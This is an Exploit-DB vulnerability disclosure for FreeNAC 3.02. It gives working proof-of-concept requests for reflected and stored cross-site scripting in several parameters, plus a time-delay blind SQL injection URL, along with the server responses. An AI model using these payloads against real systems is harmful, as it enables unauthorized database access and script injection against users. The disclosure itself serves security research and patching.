FreeNAC 3.02 - SQL Injection / Cross-Site Scripting

EDB-ID:

18900

CVE:

2012-6560 2012-6559

EDB Verified:

Author:

blake

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2012-05-19

Vulnerable App: 
FreeNAC version 3.02 SQL Injection and XSS Vulnerabilties
Date: May 19, 2012
Author: Blake
Software Link: http://sourceforge.net/project/showfiles.php?group_id=170004
Version: 3.02
Tested on: Ubuntu 8.04 (freenac version 3.02 vmware appliance)

FreeNAC FreeNAC provides Virtual LAN assignment, LAN access control (for all kinds of network devices such as Servers, Workstations, Printers, IP-Phones ..), live network end-device discovery.Both 802.1x and Cisco's VMPS port security modes are supported. VLAN, switch port management and documentation of Patch cabling is also included.


==========================================================================================================================================
Reflective Cross-Site Scripting:
Multiple parameters are vulnerable to reflective cross-site scripting.

Affected Parameters:
comment
mac 
graphtype
type 
name


Example Request:
GET /stats.php?graphtype=bar&type=vlan13<script>alert(1)</script> HTTP/1.1
Host: 192.168.1.118
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Referer: http://192.168.1.118/stats.php?graphtype=bar&type=switch
Cookie: freenac=92bcf3d911d94e33106c2e79745e8e8e

Example Response:
HTTP/1.1 200 OK
Date: Sat, 19 May 2012 17:42:41 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5676
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
	<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
	  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
	  <title>FreeNAC :: Swisscom ::</title>
	  <link href="bw.css" rel="stylesheet" type="text/css" />
	</head>
<a href='./index.html' title='Main Menu'><img src='./images/logo_small.png' border='0' /></a>


..........snip......................

<img src="statgraph.php?stattype=vlan13<script>alert(1)</script>&order=DESC&graphtype=bar"><br>
<br>  <p class='UpdateMsg'>Database error</p>
  <p>Please go <a HREF='javascript:javascript:history.go(-1)'>back to the previous screen</a>, or the 
  <a href='./index.php' >Main Menu</a> and start again, or try again later.  </p>




==========================================================================================================================================
Stored Cross-Site Scripting:
The comment parameter is vulnerable to stored cross-site scripting.

Example Request:
<changed from a POST to a GET>
http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment="><script>alert(2)</script>&action=Update&action_idx=1

Example Response:
HTTP/1.1 200 OK
Date: Sat, 19 May 2012 17:53:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6945
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
	<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
	  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
	  <title>FreeNAC :: Swisscom ::</title>
	  <link href="bw.css" rel="stylesheet" type="text/css" />
	</head>
<a href='./index.html' title='Main Menu'><img src='./images/logo_small.png' border='0' /></a>

.............snip.................

</td></tr>
         <tr><td>Switch:</td>
           <td>, port= , location=  </td>
           <td><input type="submit" name="action" class="bluebox" value="Restart Port" /> </td>
         </tr> <tr><td>Comment:</td><td>
<input name="comment" type="text" size=40 value=""><script>alert(2)</script>"/>
</td><td>Last IP:NONE<br></td>
<tr><td> </td><td></td></tr>
          <tr><td> </td><td>
          <input type="submit" name="action" class="bluebox" value="Update" /> 
          <input type="submit" name="action" class="bluebox" value="Delete" 
            onClick="javascript:return confirm('Really DELETE this end-device record?')"
            />
          </td></tr>'<tr><td> </td><td></td></tr>
<tr><td> </td><td></td></tr>
</table> <table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
<tr><td colspan=3 bgcolor="#DEDEDE"><b>Administrative information</b><tr><td>Inventory:<td>
<tr><td>Classification:


............snip....................





==========================================================================================================================================
SQL Injection:

The status parameter is vulnerable to blind SQL Injection.
Injecting a time-delay of 20 seconds:

http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services